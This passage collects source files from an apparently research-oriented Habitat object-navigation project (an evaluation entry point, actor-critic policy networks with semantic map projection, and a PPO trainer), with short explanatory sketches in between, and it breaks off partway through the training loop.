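The docstring in example.py spells out the walker contract: inherit habitat.Agent, implement reset() and act(), and expose a module-level get_agent(exp_config, challenge, checkpoint_path). A hedged sketch of a slightly less random walker that follows the same contract is shown below; loading four action probabilities from a .npy file is an invented checkpoint format used purely for illustration, not how the repository's trained agents work.
```python
import numpy as np
import habitat

class BiasedWalker(habitat.Agent):
    """Walker that samples actions from a fixed categorical distribution."""

    def __init__(self, action_probs=None):
        self._POSSIBLE_ACTIONS = np.array([0, 1, 2, 3])
        # Default: favor action 1, the forward action in this repository's numbering.
        self._probs = np.array([0.1, 0.6, 0.15, 0.15]) if action_probs is None else action_probs

    def reset(self):
        pass

    def act(self, observations):
        return {"action": np.random.choice(self._POSSIBLE_ACTIONS, p=self._probs)}

def get_agent(exp_config, challenge, checkpoint_path=None):
    # Hypothetical checkpoint format: a plain .npy array holding four action probabilities.
    probs = np.load(checkpoint_path) if checkpoint_path is not None else None
    return BiasedWalker(probs)
```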
#### File: 82magnolia/SGoLAM/evaluate.py
```python
import agents
import argparse
from habitat.core.challenge import Challenge
import importlib
from submit_args import fill_args
def main():
parser = argparse.ArgumentParser()
parser.add_argument(
"--phase", type=str, required=False, choices=["dev", "standard", "challenge", "video"]
)
parser.add_argument(
"--agent_module",
required=False,
type=str,
default="example",
help="agent module name",
)
parser.add_argument(
"--exp_config", type=str, required=False, help="Config within habitat baselines"
)
parser.add_argument(
"--checkpoint_path", type=str, required=False, help="Path to checkpoint"
)
parser.add_argument(
'--num_episodes', type=int, required=False, default=None ,help="Number of episodes to evaluate. Only works in dev mode."
)
parser.add_argument(
"--no_fill", action='store_true', required=False, help="If Set, skips fill_args"
)
parser.add_argument(
"--external", action='store_true', required=False, help="If Set, agents are loaded from extern_agents folder"
)
parser.add_argument(
"--video_dir", type=str, default=None, help="Path where videos will be logged"
)
args = parser.parse_args()
if not args.no_fill:
args = fill_args(args)
phase = args.phase
challenge = Challenge(phase = phase)
if args.phase is None or args.phase == "dev" or args.phase == "video":
if args.num_episodes is not None:
challenge.num_episodes = args.num_episodes
if args.external:
walker = importlib.import_module(f'extern_agents.{args.agent_module}')
else:
walker = importlib.import_module(f'agents.{args.agent_module}')
agent = walker.get_agent(args.exp_config, challenge, args.checkpoint_path)
if args.video_dir is not None:
from agents.video_walker import VideoWalker
args.phase = "video"
agent = VideoWalker(agent, args.video_dir)
challenge.submit(agent)
if __name__ == "__main__":
main()
```
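evaluate.py resolves the walker at run time with importlib.import_module(f'agents.{args.agent_module}') (or extern_agents.* when --external is set) and then calls the module's get_agent. A minimal stand-alone sketch of that plugin-loading convention; the package and module names are placeholders rather than the repository's layout.
```python
import importlib

def load_agent(package, module_name, *get_agent_args):
    """Import <package>.<module_name> and build an agent via its get_agent()."""
    module = importlib.import_module(f"{package}.{module_name}")
    if not hasattr(module, "get_agent"):
        raise AttributeError(f"{package}.{module_name} does not define get_agent()")
    return module.get_agent(*get_agent_args)

# Usage mirroring evaluate.py (placeholder arguments):
# agent = load_agent("agents", "example", exp_config, challenge, checkpoint_path)
```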
#### File: rl/ppo/policy.py
```python
import abc
import math
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
from habitat_baselines.common.utils import CategoricalNet, Flatten, to_grid
from habitat_baselines.rl.models.projection import Projection, RotateTensor, get_grid
from habitat_baselines.rl.models.rnn_state_encoder import RNNStateEncoder
from habitat_baselines.rl.models.simple_cnn import RGBCNNNonOracle, RGBCNNOracle, MapCNN
from habitat_baselines.rl.models.projection import Projection
class PolicyNonOracle(nn.Module):
def __init__(self, net, dim_actions):
super().__init__()
self.net = net
self.dim_actions = dim_actions
self.action_distribution = CategoricalNet(
self.net.output_size, self.dim_actions
)
self.critic = CriticHead(self.net.output_size)
def forward(self, *x):
raise NotImplementedError
def act(
self,
observations,
rnn_hidden_states,
global_map,
prev_actions,
masks,
deterministic=False,
):
features, rnn_hidden_states, global_map = self.net(
observations, rnn_hidden_states, global_map, prev_actions, masks
)
distribution = self.action_distribution(features)
value = self.critic(features)
if deterministic:
action = distribution.mode()
else:
action = distribution.sample()
action_log_probs = distribution.log_probs(action)
return value, action, action_log_probs, rnn_hidden_states, global_map
def get_value(self, observations, rnn_hidden_states, global_map, prev_actions, masks):
features, _, _ = self.net(
observations, rnn_hidden_states, global_map, prev_actions, masks
)
return self.critic(features)
def evaluate_actions(
self, observations, rnn_hidden_states, global_map, prev_actions, masks, action
):
features, rnn_hidden_states, global_map = self.net(
observations, rnn_hidden_states, global_map, prev_actions, masks, ev=1
)
distribution = self.action_distribution(features)
value = self.critic(features)
action_log_probs = distribution.log_probs(action)
distribution_entropy = distribution.entropy().mean()
return value, action_log_probs, distribution_entropy, rnn_hidden_states
class PolicyOracle(nn.Module):
def __init__(self, net, dim_actions):
super().__init__()
self.net = net
self.dim_actions = dim_actions
self.action_distribution = CategoricalNet(
self.net.output_size, self.dim_actions
)
self.critic = CriticHead(self.net.output_size)
def forward(self, *x):
raise NotImplementedError
def act(
self,
observations,
rnn_hidden_states,
prev_actions,
masks,
deterministic=False,
):
features, rnn_hidden_states = self.net(
observations, rnn_hidden_states, prev_actions, masks
)
distribution = self.action_distribution(features)
value = self.critic(features)
if deterministic:
action = distribution.mode()
else:
action = distribution.sample()
action_log_probs = distribution.log_probs(action)
return value, action, action_log_probs, rnn_hidden_states
def get_value(self, observations, rnn_hidden_states, prev_actions, masks):
features, _ = self.net(
observations, rnn_hidden_states, prev_actions, masks
)
return self.critic(features)
def evaluate_actions(
self, observations, rnn_hidden_states, prev_actions, masks, action
):
features, rnn_hidden_states = self.net(
observations, rnn_hidden_states, prev_actions, masks
)
distribution = self.action_distribution(features)
value = self.critic(features)
action_log_probs = distribution.log_probs(action)
distribution_entropy = distribution.entropy().mean()
return value, action_log_probs, distribution_entropy, rnn_hidden_states
class CriticHead(nn.Module):
def __init__(self, input_size):
super().__init__()
self.fc = nn.Linear(input_size, 1)
nn.init.orthogonal_(self.fc.weight)
nn.init.constant_(self.fc.bias, 0)
def forward(self, x):
return self.fc(x)
class BaselinePolicyNonOracle(PolicyNonOracle):
def __init__(
self,
batch_size,
observation_space,
action_space,
goal_sensor_uuid,
device,
object_category_embedding_size,
previous_action_embedding_size,
use_previous_action,
egocentric_map_size,
global_map_size,
global_map_depth,
coordinate_min,
coordinate_max,
hidden_size=512,
):
super().__init__(
BaselineNetNonOracle(
batch_size,
observation_space=observation_space,
hidden_size=hidden_size,
goal_sensor_uuid=goal_sensor_uuid,
device=device,
object_category_embedding_size=object_category_embedding_size,
previous_action_embedding_size=previous_action_embedding_size,
use_previous_action=use_previous_action,
egocentric_map_size=egocentric_map_size,
global_map_size=global_map_size,
global_map_depth=global_map_depth,
coordinate_min=coordinate_min,
coordinate_max=coordinate_max,
),
action_space.n,
)
class BaselinePolicyOracle(PolicyOracle):
def __init__(
self,
agent_type,
observation_space,
action_space,
goal_sensor_uuid,
device,
object_category_embedding_size,
previous_action_embedding_size,
use_previous_action,
hidden_size=512,
):
super().__init__(
BaselineNetOracle(
agent_type,
observation_space=observation_space,
hidden_size=hidden_size,
goal_sensor_uuid=goal_sensor_uuid,
device=device,
object_category_embedding_size=object_category_embedding_size,
previous_action_embedding_size=previous_action_embedding_size,
use_previous_action=use_previous_action,
),
action_space.n,
)
class Net(nn.Module, metaclass=abc.ABCMeta):
@abc.abstractmethod
def forward(self, observations, rnn_hidden_states, global_map, prev_actions):
pass
@property
@abc.abstractmethod
def output_size(self):
pass
@property
@abc.abstractmethod
def num_recurrent_layers(self):
pass
@property
@abc.abstractmethod
def is_blind(self):
pass
class BaselineNetNonOracle(Net):
r"""Network that passes the input image through a CNN, concatenates the
goal vector with the CNN's output, and passes the result through an RNN.
"""
def __init__(self, batch_size, observation_space, hidden_size, goal_sensor_uuid, device,
object_category_embedding_size, previous_action_embedding_size, use_previous_action,
egocentric_map_size, global_map_size, global_map_depth, coordinate_min, coordinate_max
):
super().__init__()
self.goal_sensor_uuid = goal_sensor_uuid
self._n_input_goal = observation_space.spaces[
self.goal_sensor_uuid
].shape[0]
self._hidden_size = hidden_size
self.device = device
self.use_previous_action = use_previous_action
self.egocentric_map_size = egocentric_map_size
self.global_map_size = global_map_size
self.global_map_depth = global_map_depth
self.visual_encoder = RGBCNNNonOracle(observation_space, hidden_size)
self.map_encoder = MapCNN(51, 256, "non-oracle")
self.projection = Projection(egocentric_map_size, global_map_size,
device, coordinate_min, coordinate_max
)
self.to_grid = to_grid(global_map_size, coordinate_min, coordinate_max)
self.rotate_tensor = RotateTensor(device)
self.image_features_linear = nn.Linear(32 * 28 * 28, 512)
self.flatten = Flatten()
if self.use_previous_action:
self.state_encoder = RNNStateEncoder(
self._hidden_size + 256 + object_category_embedding_size +
previous_action_embedding_size, self._hidden_size,
)
else:
self.state_encoder = RNNStateEncoder(
(0 if self.is_blind else self._hidden_size) + object_category_embedding_size,
self._hidden_size, #Replace 2 by number of target categories later
)
self.goal_embedding = nn.Embedding(8, object_category_embedding_size)
self.action_embedding = nn.Embedding(4, previous_action_embedding_size)
self.full_global_map = torch.zeros(
batch_size,
global_map_size,
global_map_size,
global_map_depth,
device=self.device,
)
self.train()
@property
def output_size(self):
return self._hidden_size
@property
def is_blind(self):
return self.visual_encoder.is_blind
@property
def num_recurrent_layers(self):
return self.state_encoder.num_recurrent_layers
def get_target_encoding(self, observations):
return observations[self.goal_sensor_uuid]
def forward(self, observations, rnn_hidden_states, global_map, prev_actions, masks, ev=0):
target_encoding = self.get_target_encoding(observations)
goal_embed = self.goal_embedding((target_encoding).type(torch.LongTensor).to(self.device)).squeeze(1)
if not self.is_blind:
perception_embed = self.visual_encoder(observations)
# interpolated_perception_embed = F.interpolate(perception_embed, scale_factor=256./28., mode='bilinear')
projection = self.projection.forward(perception_embed, observations['depth'] * 10, -(observations["compass"]))
perception_embed = self.image_features_linear(self.flatten(perception_embed))
grid_x, grid_y = self.to_grid.get_grid_coords(observations['gps'])
# grid_x_coord, grid_y_coord = grid_x.type(torch.uint8), grid_y.type(torch.uint8)
bs = global_map.shape[0]
##forward pass specific
if ev == 0:
self.full_global_map[:bs, :, :, :] = self.full_global_map[:bs, :, :, :] * masks.unsqueeze(1).unsqueeze(1)
if bs != 18:
self.full_global_map[bs:, :, :, :] = self.full_global_map[bs:, :, :, :] * 0
if torch.cuda.is_available():
with torch.cuda.device(self.device):
agent_view = torch.cuda.FloatTensor(bs, self.global_map_depth, self.global_map_size, self.global_map_size).fill_(0)
else:
agent_view = torch.FloatTensor(bs, self.global_map_depth, self.global_map_size, self.global_map_size).to(self.device).fill_(0)
agent_view[:, :,
self.global_map_size//2 - math.floor(self.egocentric_map_size/2):self.global_map_size//2 + math.ceil(self.egocentric_map_size/2),
self.global_map_size//2 - math.floor(self.egocentric_map_size/2):self.global_map_size//2 + math.ceil(self.egocentric_map_size/2)
] = projection
st_pose = torch.cat(
[-(grid_y.unsqueeze(1)-(self.global_map_size//2))/(self.global_map_size//2),
-(grid_x.unsqueeze(1)-(self.global_map_size//2))/(self.global_map_size//2),
observations['compass']],
dim=1
)
rot_mat, trans_mat = get_grid(st_pose, agent_view.size(), self.device)
rotated = F.grid_sample(agent_view, rot_mat)
translated = F.grid_sample(rotated, trans_mat)
self.full_global_map[:bs, :, :, :] = torch.max(self.full_global_map[:bs, :, :, :], translated.permute(0, 2, 3, 1))
st_pose_retrieval = torch.cat(
[
(grid_y.unsqueeze(1)-(self.global_map_size//2))/(self.global_map_size//2),
(grid_x.unsqueeze(1)-(self.global_map_size//2))/(self.global_map_size//2),
torch.zeros_like(observations['compass'])
],
dim=1
)
_, trans_mat_retrieval = get_grid(st_pose_retrieval, agent_view.size(), self.device)
translated_retrieval = F.grid_sample(self.full_global_map[:bs, :, :, :].permute(0, 3, 1, 2), trans_mat_retrieval)
translated_retrieval = translated_retrieval[:,:,
self.global_map_size//2-math.floor(51/2):self.global_map_size//2+math.ceil(51/2),
self.global_map_size//2-math.floor(51/2):self.global_map_size//2+math.ceil(51/2)
]
final_retrieval = self.rotate_tensor.forward(translated_retrieval, observations["compass"])
global_map_embed = self.map_encoder(final_retrieval.permute(0, 2, 3, 1))
if self.use_previous_action:
action_embedding = self.action_embedding(prev_actions).squeeze(1)
x = torch.cat((perception_embed, global_map_embed, goal_embed, action_embedding), dim = 1)
x, rnn_hidden_states = self.state_encoder(x, rnn_hidden_states, masks)
return x, rnn_hidden_states, final_retrieval.permute(0, 2, 3, 1)
else:
global_map = global_map * masks.unsqueeze(1).unsqueeze(1) ##verify
with torch.cuda.device(1):
agent_view = torch.cuda.FloatTensor(bs, self.global_map_depth, 51, 51).fill_(0)
agent_view[:, :,
51//2 - math.floor(self.egocentric_map_size/2):51//2 + math.ceil(self.egocentric_map_size/2),
51//2 - math.floor(self.egocentric_map_size/2):51//2 + math.ceil(self.egocentric_map_size/2)
] = projection
final_retrieval = torch.max(global_map, agent_view.permute(0, 2, 3, 1))
global_map_embed = self.map_encoder(final_retrieval)
if self.use_previous_action:
action_embedding = self.action_embedding(prev_actions).squeeze(1)
x = torch.cat((perception_embed, global_map_embed, goal_embed, action_embedding), dim = 1)
x, rnn_hidden_states = self.state_encoder(x, rnn_hidden_states, masks)
return x, rnn_hidden_states, final_retrieval.permute(0, 2, 3, 1)
class BaselineNetOracle(Net):
r"""Network that passes the input image through a CNN, concatenates the
goal vector with the CNN's output, and passes the result through an RNN.
"""
def __init__(self, agent_type, observation_space, hidden_size, goal_sensor_uuid, device,
object_category_embedding_size, previous_action_embedding_size, use_previous_action
):
super().__init__()
self.agent_type = agent_type
self.goal_sensor_uuid = goal_sensor_uuid
self._n_input_goal = observation_space.spaces[
self.goal_sensor_uuid
].shape[0]
self._hidden_size = hidden_size
self.device = device
self.use_previous_action = use_previous_action
self.visual_encoder = RGBCNNOracle(observation_space, 512)
if agent_type == "oracle":
self.map_encoder = MapCNN(50, 256, agent_type)
self.occupancy_embedding = nn.Embedding(3, 16)
self.object_embedding = nn.Embedding(9, 16)
self.goal_embedding = nn.Embedding(9, object_category_embedding_size)
elif agent_type == "no-map":
self.goal_embedding = nn.Embedding(8, object_category_embedding_size)
elif agent_type == "oracle-ego":
self.map_encoder = MapCNN(50, 256, agent_type)
self.object_embedding = nn.Embedding(10, 16)
self.goal_embedding = nn.Embedding(9, object_category_embedding_size)
self.action_embedding = nn.Embedding(4, previous_action_embedding_size)
if self.use_previous_action:
self.state_encoder = RNNStateEncoder(
(self._hidden_size) + object_category_embedding_size +
previous_action_embedding_size, self._hidden_size,
)
else:
self.state_encoder = RNNStateEncoder(
(self._hidden_size) + object_category_embedding_size,
self._hidden_size, #Replace 2 by number of target categories later
)
self.train()
@property
def output_size(self):
return self._hidden_size
@property
def is_blind(self):
return self.visual_encoder.is_blind
@property
def num_recurrent_layers(self):
return self.state_encoder.num_recurrent_layers
def get_target_encoding(self, observations):
return observations[self.goal_sensor_uuid]
def forward(self, observations, rnn_hidden_states, prev_actions, masks):
target_encoding = self.get_target_encoding(observations)
x = [self.goal_embedding((target_encoding).type(torch.LongTensor).to(self.device)).squeeze(1)]
bs = target_encoding.shape[0]
if not self.is_blind:
perception_embed = self.visual_encoder(observations)
x = [perception_embed] + x
if self.agent_type != "no-map":
global_map_embedding = []
global_map = observations['semMap']
if self.agent_type == "oracle":
global_map_embedding.append(self.occupancy_embedding(global_map[:, :, :, 0].type(torch.LongTensor).to(self.device).view(-1)).view(bs, 50, 50 , -1))
global_map_embedding.append(self.object_embedding(global_map[:, :, :, 1].type(torch.LongTensor).to(self.device).view(-1)).view(bs, 50, 50, -1))
global_map_embedding = torch.cat(global_map_embedding, dim=3)
map_embed = self.map_encoder(global_map_embedding)
x = [map_embed] + x
if self.use_previous_action:
x = torch.cat(x + [self.action_embedding(prev_actions).squeeze(1)], dim=1)
else:
x = torch.cat(x, dim=1)
x, rnn_hidden_states = self.state_encoder(x, rnn_hidden_states, masks)
return x, rnn_hidden_states
```
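Both policy classes above follow the same actor-critic recipe: a shared network produces features, CategoricalNet turns them into an action distribution (mode() when acting deterministically, sample() otherwise), and a linear critic head scores the state, while evaluate_actions additionally returns log-probabilities and entropy for the PPO update. A minimal sketch of that act/evaluate split with torch.distributions.Categorical, detached from the habitat-specific encoders and with arbitrary sizes:
```python
import torch
import torch.nn as nn
from torch.distributions import Categorical

class TinyActorCritic(nn.Module):
    def __init__(self, obs_dim=16, hidden=32, n_actions=4):
        super().__init__()
        self.body = nn.Sequential(nn.Linear(obs_dim, hidden), nn.ReLU())
        self.actor = nn.Linear(hidden, n_actions)  # logits for the action distribution
        self.critic = nn.Linear(hidden, 1)         # state-value head

    def act(self, obs, deterministic=False):
        feats = self.body(obs)
        dist = Categorical(logits=self.actor(feats))
        action = dist.probs.argmax(dim=-1) if deterministic else dist.sample()
        return self.critic(feats), action, dist.log_prob(action)

    def evaluate_actions(self, obs, action):
        feats = self.body(obs)
        dist = Categorical(logits=self.actor(feats))
        return self.critic(feats), dist.log_prob(action), dist.entropy().mean()

model = TinyActorCritic()
value, action, log_prob = model.act(torch.randn(5, 16))
value2, log_prob2, entropy = model.evaluate_actions(torch.randn(5, 16), action)
print(value.shape, action.shape, log_prob.shape, entropy.item())
```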
#### File: rl/ppo/ppo_trainer.py
```python
from habitat_baselines.rl.ppo.ppo import PPONonOracle
import json
import os
import time
from collections import defaultdict, deque
from typing import Any, Dict, List, Optional
from einops import rearrange
import math
import numpy as np
import torch
import torch.nn.functional as F
import torch_scatter
import tqdm
from torch.optim.lr_scheduler import LambdaLR
from habitat import Config, logger
from habitat.utils.visualizations.utils import observations_to_image
from habitat_baselines.common.base_trainer import BaseRLTrainerNonOracle, BaseRLTrainerOracle
from habitat_baselines.common.baseline_registry import baseline_registry
from habitat_baselines.common.env_utils import construct_envs
from habitat_baselines.common.environments import get_env_class
from habitat_baselines.common.rollout_storage import RolloutStorageOracle, RolloutStorageNonOracle
from habitat_baselines.common.tensorboard_utils import TensorboardWriter
from habitat_baselines.common.utils import (
batch_obs,
generate_video,
linear_decay,
)
from habitat_baselines.rl.ppo import PPONonOracle, PPOOracle, BaselinePolicyNonOracle, BaselinePolicyOracle
from habitat.core.vector_env import VectorEnv
@baseline_registry.register_trainer(name="non-oracle")
class PPOTrainerNO(BaseRLTrainerNonOracle):
r"""Trainer class for PPO algorithm
Paper: https://arxiv.org/abs/1707.06347.
"""
supported_tasks = ["Nav-v0"]
def __init__(self, config=None):
super().__init__(config)
self.actor_critic = None
self.agent = None
self.envs = None
if config is not None:
logger.info(f"config: {config}")
self._static_encoder = False
self._encoder = None
def _setup_actor_critic_agent(self, ppo_cfg: Config) -> None:
r"""Sets up actor critic and agent for PPO.
Args:
ppo_cfg: config node with relevant params
Returns:
None
"""
logger.add_filehandler(self.config.LOG_FILE)
if isinstance(self.envs, VectorEnv):
self.actor_critic = BaselinePolicyNonOracle(
batch_size=self.config.NUM_PROCESSES,
observation_space=self.envs.observation_spaces[0],
action_space=self.envs.action_spaces[0],
hidden_size=ppo_cfg.hidden_size,
goal_sensor_uuid=self.config.TASK_CONFIG.TASK.GOAL_SENSOR_UUID,
device=self.device,
object_category_embedding_size=self.config.RL.OBJECT_CATEGORY_EMBEDDING_SIZE,
previous_action_embedding_size=self.config.RL.PREVIOUS_ACTION_EMBEDDING_SIZE,
use_previous_action=self.config.RL.PREVIOUS_ACTION,
egocentric_map_size=self.config.RL.MAPS.egocentric_map_size,
global_map_size=self.config.RL.MAPS.global_map_size,
global_map_depth=self.config.RL.MAPS.global_map_depth,
coordinate_min=self.config.RL.MAPS.coordinate_min,
coordinate_max=self.config.RL.MAPS.coordinate_max
)
else:
self.actor_critic = BaselinePolicyNonOracle(
batch_size=self.config.NUM_PROCESSES,
observation_space=self.envs.observation_space,
action_space=self.envs.action_space,
hidden_size=ppo_cfg.hidden_size,
goal_sensor_uuid=self.config.TASK_CONFIG.TASK.GOAL_SENSOR_UUID,
device=self.device,
object_category_embedding_size=self.config.RL.OBJECT_CATEGORY_EMBEDDING_SIZE,
previous_action_embedding_size=self.config.RL.PREVIOUS_ACTION_EMBEDDING_SIZE,
use_previous_action=self.config.RL.PREVIOUS_ACTION,
egocentric_map_size=self.config.RL.MAPS.egocentric_map_size,
global_map_size=self.config.RL.MAPS.global_map_size,
global_map_depth=self.config.RL.MAPS.global_map_depth,
coordinate_min=self.config.RL.MAPS.coordinate_min,
coordinate_max=self.config.RL.MAPS.coordinate_max
)
self.actor_critic.to(self.device)
self.agent = PPONonOracle(
actor_critic=self.actor_critic,
clip_param=ppo_cfg.clip_param,
ppo_epoch=ppo_cfg.ppo_epoch,
num_mini_batch=ppo_cfg.num_mini_batch,
value_loss_coef=ppo_cfg.value_loss_coef,
entropy_coef=ppo_cfg.entropy_coef,
lr=ppo_cfg.lr,
eps=ppo_cfg.eps,
max_grad_norm=ppo_cfg.max_grad_norm,
use_normalized_advantage=ppo_cfg.use_normalized_advantage,
)
def save_checkpoint(
self, file_name: str, extra_state: Optional[Dict] = None
) -> None:
r"""Save checkpoint with specified name.
Args:
file_name: file name for checkpoint
Returns:
None
"""
checkpoint = {
"state_dict": self.agent.state_dict(),
"config": self.config,
}
if extra_state is not None:
checkpoint["extra_state"] = extra_state
torch.save(
checkpoint, os.path.join(self.config.CHECKPOINT_FOLDER, file_name)
)
def load_checkpoint(self, checkpoint_path: str, *args, **kwargs) -> Dict:
r"""Load checkpoint of specified path as a dict.
Args:
checkpoint_path: path of target checkpoint
*args: additional positional args
**kwargs: additional keyword args
Returns:
dict containing checkpoint info
"""
return torch.load(checkpoint_path, *args, **kwargs)
METRICS_BLACKLIST = {"top_down_map", "collisions.is_collision", "raw_metrics"}
@classmethod
def _extract_scalars_from_info(
cls, info: Dict[str, Any]
) -> Dict[str, float]:
result = {}
for k, v in info.items():
if k in cls.METRICS_BLACKLIST:
continue
if isinstance(v, dict):
result.update(
{
k + "." + subk: subv
for subk, subv in cls._extract_scalars_from_info(
v
).items()
if (k + "." + subk) not in cls.METRICS_BLACKLIST
}
)
# Things that are scalar-like will have an np.size of 1.
# Strings also have an np.size of 1, so explicitly ban those
elif np.size(v) == 1 and not isinstance(v, str):
result[k] = float(v)
return result
@classmethod
def _extract_scalars_from_infos(
cls, infos: List[Dict[str, Any]]
) -> Dict[str, List[float]]:
results = defaultdict(list)
for i in range(len(infos)):
for k, v in cls._extract_scalars_from_info(infos[i]).items():
results[k].append(v)
return results
def _collect_rollout_step(
self, rollouts, current_episode_reward, running_episode_stats
):
pth_time = 0.0
env_time = 0.0
t_sample_action = time.time()
# sample actions
with torch.no_grad():
step_observation = {
k: v[rollouts.step] for k, v in rollouts.observations.items()
}
(
values,
actions,
actions_log_probs,
recurrent_hidden_states,
global_map,
) = self.actor_critic.act(
step_observation,
rollouts.recurrent_hidden_states[rollouts.step],
rollouts.global_map[rollouts.step],
rollouts.prev_actions[rollouts.step],
rollouts.masks[rollouts.step],
)
pth_time += time.time() - t_sample_action
t_step_env = time.time()
outputs = self.envs.step([a[0].item() for a in actions])
observations, rewards, dones, infos = [list(x) for x in zip(*outputs)]
env_time += time.time() - t_step_env
t_update_stats = time.time()
batch = batch_obs(observations, device=self.device)
rewards = torch.tensor(
rewards, dtype=torch.float, device=current_episode_reward.device
)
rewards = rewards.unsqueeze(1)
masks = torch.tensor(
[[0.0] if done else [1.0] for done in dones],
dtype=torch.float,
device=current_episode_reward.device,
)
current_episode_reward += rewards
running_episode_stats["reward"] += (1 - masks) * current_episode_reward
running_episode_stats["count"] += 1 - masks
for k, v in self._extract_scalars_from_infos(infos).items():
v = torch.tensor(
v, dtype=torch.float, device=current_episode_reward.device
).unsqueeze(1)
if k not in running_episode_stats:
running_episode_stats[k] = torch.zeros_like(
running_episode_stats["count"]
)
running_episode_stats[k] += (1 - masks) * v
current_episode_reward *= masks
if self._static_encoder:
with torch.no_grad():
batch["visual_features"] = self._encoder(batch)
rollouts.insert(
batch,
recurrent_hidden_states,
global_map,
actions,
actions_log_probs,
values,
rewards,
masks,
)
pth_time += time.time() - t_update_stats
return pth_time, env_time, self.envs.num_envs
def _update_agent(self, ppo_cfg, rollouts):
t_update_model = time.time()
with torch.no_grad():
last_observation = {
k: v[rollouts.step] for k, v in rollouts.observations.items()
}
next_value = self.actor_critic.get_value(
last_observation,
rollouts.recurrent_hidden_states[rollouts.step],
rollouts.global_map[rollouts.step],
rollouts.prev_actions[rollouts.step],
rollouts.masks[rollouts.step],
).detach()
rollouts.compute_returns(
next_value, ppo_cfg.use_gae, ppo_cfg.gamma, ppo_cfg.tau
)
value_loss, action_loss, dist_entropy = self.agent.update(rollouts)
rollouts.after_update()
return (
time.time() - t_update_model,
value_loss,
action_loss,
dist_entropy,
)
def train(self) -> None:
r"""Main method for training PPO.
Returns:
None
"""
self.envs = construct_envs(
self.config, get_env_class(self.config.ENV_NAME)
)
ppo_cfg = self.config.RL.PPO
self.device = (
torch.device("cuda", self.config.TORCH_GPU_ID)
if torch.cuda.is_available()
else torch.device("cpu")
)
if not os.path.isdir(self.config.CHECKPOINT_FOLDER):
os.makedirs(self.config.CHECKPOINT_FOLDER)
self._setup_actor_critic_agent(ppo_cfg)
logger.info(
"agent number of parameters: {}".format(
sum(param.numel() for param in self.agent.parameters())
)
)
rollouts = RolloutStorageNonOracle(
ppo_cfg.num_steps,
self.envs.num_envs,
self.envs.observation_spaces[0],
self.envs.action_spaces[0],
ppo_cfg.hidden_size,
self.config.RL.MAPS.global_map_size,
self.config.RL.MAPS.global_map_depth,
)
rollouts.to(self.device)
observations = self.envs.reset()
batch = batch_obs(observations, device=self.device)
for sensor in rollouts.observations:
rollouts.observations[sensor][0].copy_(batch[sensor])
# batch and observations may contain shared PyTorch CUDA
# tensors. We must explicitly clear them here otherwise
# they will be kept in memory for the entire duration of training!
batch = None
observations = None
current_episode_reward = torch.zeros(self.envs.num_envs, 1)
running_episode_stats = dict(
count=torch.zeros(self.envs.num_envs, 1),
reward=torch.zeros(self.envs.num_envs, 1),
)
window_episode_stats = defaultdict(
lambda: deque(maxlen=ppo_cfg.reward_window_size)
)
t_start = time.time()
env_time = 0
pth_time = 0
count_steps = 0
count_checkpoints = 0
lr_scheduler = LambdaLR(
optimizer=self.agent.optimizer,
lr_lambda=lambda x: linear_decay(x, self.config.NUM_UPDATES),
)
with TensorboardWriter(
self.config.TENSORBOARD_DIR, flush_secs=self.flush_secs
) as writer:
for update in range(self.config.NUM_UPDATES):
if ppo_cfg.use_linear_lr_decay:
lr_scheduler.step()
if ppo_cfg.use_linear_clip_decay:
self.agent.clip_param = ppo_cfg.clip_param * linear_decay(
update, self.config.NUM_UPDATES
)
for step in range(ppo_cfg.num_steps):
(
delta_pth_time,
delta_env_time,
delta_steps,
) = self._collect_rollout_step(
rollouts, current_episode_reward, running_episode_stats
)
pth_time += delta_pth_time
env_time += delta_env_time
count_steps += delta_steps
(
delta_pth_time,
value_loss,
action_loss,
dist_entropy,
) = self._update_agent(ppo_cfg, rollouts)
pth_time += delta_pth_time
for k, v in running_episode_stats.items():
window_episode_stats[k].append(v.clone())
deltas = {
k: (
(v[-1] - v[0]).sum().item()
if len(v) > 1
else v[0].sum().item()
)
for k, v in window_episode_stats.items()
}
deltas["count"] = max(deltas["count"], 1.0)
writer.add_scalar(
"train/reward", deltas["reward"] / deltas["count"], count_steps
)
writer.add_scalar(
"train/learning_rate", lr_scheduler._last_lr[0], count_steps
)
total_actions = rollouts.actions.shape[0] * rollouts.actions.shape[1]
total_found_actions = int(torch.sum(rollouts.actions == 0).cpu().numpy())
total_forward_actions = int(torch.sum(rollouts.actions == 1).cpu().numpy())
total_left_actions = int(torch.sum(rollouts.actions == 2).cpu().numpy())
total_right_actions = int(torch.sum(rollouts.actions == 3).cpu().numpy())
total_look_up_actions = int(torch.sum(rollouts.actions == 4).cpu().numpy())
total_look_down_actions = int(torch.sum(rollouts.actions == 5).cpu().numpy())
assert total_actions == (total_found_actions + total_forward_actions +
total_left_actions + total_right_actions + total_look_up_actions +
total_look_down_actions
)
# Check later why this assertion is not true
# total_actions = (total_stop_actions + total_forward_actions +
# total_left_actions + total_right_actions + total_look_up_actions +
# total_look_down_actions
# )
writer.add_histogram(
"map_encoder_cnn_0", self.actor_critic.net.map_encoder.cnn[0].weight, count_steps
)
writer.add_histogram(
"map_encoder_cnn_1", self.actor_critic.net.map_encoder.cnn[2].weight, count_steps
)
writer.add_histogram(
"map_encoder_cnn_2", self.actor_critic.net.map_encoder.cnn[4].weight, count_steps
)
writer.add_histogram(
"map_encoder_linear", self.actor_critic.net.map_encoder.cnn[6].weight, count_steps
)
writer.add_histogram(
"visual_encoder_cnn_0", self.actor_critic.net.visual_encoder.cnn[0].weight, count_steps
)
writer.add_histogram(
"visual_encoder_cnn_1", self.actor_critic.net.visual_encoder.cnn[2].weight, count_steps
)
writer.add_histogram(
"visual_encoder_cnn_2", self.actor_critic.net.visual_encoder.cnn[4].weight, count_steps
)
writer.add_histogram(
"visual_encoder_linear", self.actor_critic.net.image_features_linear.weight, count_steps
)
writer.add_scalar(
"train/found_action_prob", total_found_actions/total_actions, count_steps
)
writer.add_scalar(
"train/forward_action_prob", total_forward_actions/total_actions, count_steps
)
writer.add_scalar(
"train/left_action_prob", total_left_actions/total_actions, count_steps
)
writer.add_scalar(
"train/right_action_prob", total_right_actions/total_actions, count_steps
)
writer.add_scalar(
"train/look_up_action_prob", total_look_up_actions/total_actions, count_steps
)
writer.add_scalar(
"train/look_down_action_prob", total_look_down_actions/total_actions, count_steps
)
metrics = {
k: v / deltas["count"]
for k, v in deltas.items()
if k not in {"reward", "count"}
}
if len(metrics) > 0:
writer.add_scalar("metrics/distance_to_currgoal", metrics["distance_to_currgoal"], count_steps)
writer.add_scalar("metrics/success", metrics["success"], count_steps)
